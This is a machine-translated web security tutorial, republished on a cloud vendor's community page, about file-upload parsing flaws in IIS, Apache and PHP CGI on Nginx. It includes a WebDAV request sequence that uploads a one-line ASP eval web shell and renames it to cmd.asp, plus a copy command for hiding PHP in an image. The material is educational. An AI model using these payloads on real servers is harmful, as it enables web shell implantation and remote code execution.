Home > Others

[Web Security] Upload Vulnerability Parsing vulnerability

Source: Internet
Author: User
Tags php script
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
One, IIS parsing vulnerabilities
1. When you create a folder in *.asa, *.asp format, any files in its directory will be parsed by IIS as an ASP file.
2. When the file is *.asp;1.jpg, IIS 6.0 is also executed as an ASP script.
Microsoft does not think this is a loophole, and has not introduced the IIS 6.0 patch, so the two "vulnerabilities" still exist.
3.WebDav Vulnerability (use of IIS Write permissions)

The first step is to use the HTTP method supported by the options probe server

Request:
options/http/1.1
Host:www.example.com


response:
...
public:options,trace,get,head,delete,put,post,copy,move,mkcol,propfind,proppatch,lock,unlock,search
...
The second step is to upload the script file to the server through the Put method 

Request:
put/a.txt http/1.1
Host:www.example.com
content-length:30

<%eval request ("Chopper")%>
Step three, change the name by the move or copy method 

Request:
copy/a.txt http/1.1
Host:www.example.com
destination:http://www.example.com/cmd.asp
Fourth step, using the Delete method, an attacker can also delete any file on the server 

Request:
delete/a.txt http/1.1
Host:www.example.com

Second, the Apache Parsing vulnerability

In Apache 1.x and Apache 2.x, 1.php.rar is executed as a PHP file.
Apache has a principle for parsing files: When you encounter an extension that you do not know, you will parse it from the back until you meet the extension you know, and if you don't, you will expose your source code.

This approach bypasses blacklist-based checks.

The extension known as Apache is saved in the "/conf/mime.types" file under the installation directory. The following figure is the case for this machine, the file is C:\wamp\bin\apache\Apache2.2.21\conf\mime.types in the path



Third, PHP CGI parsing vulnerability
In some Web sites that use Nginx, access to http://www.xxser.com/1.jpg/1.php, the 1.jpg will be interpreted as PHP script, at this time 1.php does not exist.
This means that the attacker can upload a legitimate "picture" (Photo Trojan), and then add "/xxx.php" after the URL, you can get the site's Webshell.

This is not a nginx-specific vulnerability, and such parsing vulnerabilities often occur in web containers such as IIS7.0, IIS7.5, and lighttpd.

This parsing vulnerability is actually a PHP CGI vulnerability, and there is a key option in the PHP configuration file Cgi.fix_pathinfo is located in the local C:\wamp\bin\php\php5.3.10\ PHP.ini, the default is open, when the URL does not exist in the file, PHP will be recursively resolved forward.


Attach: Use copy command to make picture trojan: Copy 1.jpg/b+1.php/a 2.php (where/b means binary file,/A for ASCII file)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
teamviewer security vulnerability security vulnerability database hikvision security vulnerability acunetix web vulnerability scanner best web vulnerability scanner free web vulnerability scanner web app vulnerability scanner

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More